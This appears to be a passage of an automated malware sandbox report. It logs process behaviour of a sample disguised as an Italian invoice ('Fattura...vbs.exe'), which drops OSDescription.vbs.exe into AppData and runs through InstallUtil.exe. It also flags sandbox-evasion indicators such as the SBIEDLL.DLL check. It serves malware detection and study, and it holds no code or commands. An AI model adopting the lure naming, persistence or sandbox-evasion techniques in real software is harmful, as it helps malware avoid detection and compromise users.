                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: Fattura-24SC-99245969925904728562.vbs.exe PID: 7764, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: OSDescription.vbs.exe PID: 6024, type: MEMORYSTR
                Source: c:\users\user\appdata\roaming\osdescription.vbs.exeKey value queried: Powershell behavior
                Source: c:\users\user\desktop\fattura-24sc-99245969925904728562.vbs.exeKey value queried: Powershell behaviorJump to behavior
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005095000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeMemory allocated: 47D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeMemory allocated: 8310000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 710000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2520000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2270000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeMemory allocated: 42B0000 memory reserve | memory write watch
